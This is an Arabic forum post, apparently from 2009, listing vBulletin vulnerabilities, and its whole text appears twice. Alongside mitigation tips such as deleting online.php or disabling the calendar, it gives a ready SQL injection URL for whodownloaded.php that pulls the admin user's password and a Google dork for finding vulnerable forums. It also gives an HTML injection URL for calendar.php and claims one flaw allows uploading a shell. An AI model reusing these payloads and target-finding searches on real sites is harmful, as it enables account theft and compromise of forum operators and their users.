Bakenam
04-05-2009, 06:52 AM
«®°·.¸.•°°·.¸¸.•°°·.¸.•°®»بسم الله الرحمن الرحيم«®°·.¸.•°°·.¸¸.•°°·.¸.•°®»
جديده في نسخ 3.5.4 وفي سكربت تذاكر الدعم الفني جديده
[ ثغره]المتواجدين الان .. خطيره جدا تسمح برفع الشل
الطريقة الاولي : احذف ملف online.php
الطريقة الثانيه الحمايه من الثغره فهي عن طريق عدم توفير هذه الشروط مثلا الثغره تتطلب ان يكون
$vboptions['showforumusers'] == True
و $DB_site->fetch_array($forumusers) == True قم بتغيير القيم وتنحل المشكله
قم بتغير true الي false
انتهى...
ثغرة تنزيل الملفات بالتفصـيـل ,,vBulletin,,
الـثغرة : من قام بتحميل هذا الملف ,,
نوع الثغرة : SQL Injection in vBulletin ,,
خـطورة الـثغرة : مرتفعة (( T0p )) ,,
معلومـات الثغرة : مـوجودة فـي احـد هـاكات منتديات vb ,,
الإصدارات المصابة :
جـميع إصدارات الـجيل الثالث لمنتديات الـ vb ,,
>>> vBulletin 3.x.x ,,
################
كود الثـغرة :
رمز Code:
whodownloaded.php?attachmentid=-1%20UNION%20SELECT%20password%20FROM%20user%20WHER E%20userid=1
كلمة البحث في قوقل :
رمز Code:
inurl:vb/whodownloaded.php
يتبع
ثغره جديده في منتديات vBulletin
من نوع Html_Injection
يعن تقدر تستخدم inject HTML/********** codes
vBulletin Version 3.5.1
و
vBulletin Version 3.5.2
وهي في التقويم
واشتغلت تمام وهي سهله جداً
وهذا الاستغلال
رمز Code:
calendar.php?do=addreminder&e=1
ضعه بعد رابط المنتدى
الترقيع غير متوفر الان
لكن الحل القاطع للثغره الأن هو إغلاق خاصية التقويم
يتبع
ثغرة أخر عشر مواضيع vb3 / vb2 (خطير)
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
((طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط))
جديده في نسخ 3.5.4 وفي سكربت تذاكر الدعم الفني جديده
[ ثغره]المتواجدين الان .. خطيره جدا تسمح برفع الشل
الطريقة الاولي : احذف ملف online.php
الطريقة الثانيه الحمايه من الثغره فهي عن طريق عدم توفير هذه الشروط مثلا الثغره تتطلب ان يكون
$vboptions['showforumusers'] == True
و $DB_site->fetch_array($forumusers) == True قم بتغيير القيم وتنحل المشكله
قم بتغير true الي false
انتهى...
ثغرة تنزيل الملفات بالتفصـيـل ,,vBulletin,,
الـثغرة : من قام بتحميل هذا الملف ,,
نوع الثغرة : SQL Injection in vBulletin ,,
خـطورة الـثغرة : مرتفعة (( T0p )) ,,
معلومـات الثغرة : مـوجودة فـي احـد هـاكات منتديات vb ,,
الإصدارات المصابة :
جـميع إصدارات الـجيل الثالث لمنتديات الـ vb ,,
>>> vBulletin 3.x.x ,,
################
كود الثـغرة :
رمز Code:
whodownloaded.php?attachmentid=-1%20UNION%20SELECT%20password%20FROM%20user%20WHER E%20userid=1
كلمة البحث في قوقل :
رمز Code:
inurl:vb/whodownloaded.php
يتبع
ثغره جديده في منتديات vBulletin
من نوع Html_Injection
يعن تقدر تستخدم inject HTML/********** codes
vBulletin Version 3.5.1
و
vBulletin Version 3.5.2
وهي في التقويم
واشتغلت تمام وهي سهله جداً
وهذا الاستغلال
رمز Code:
calendar.php?do=addreminder&e=1
ضعه بعد رابط المنتدى
الترقيع غير متوفر الان
لكن الحل القاطع للثغره الأن هو إغلاق خاصية التقويم
يتبع
ثغرة أخر عشر مواضيع vb3 / vb2 (خطير)
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
((طريقة إغلاق الثغرة إفتح ملف أخر عشر مواضيع وابحث عن الدالة $fsel واحذفها فقط))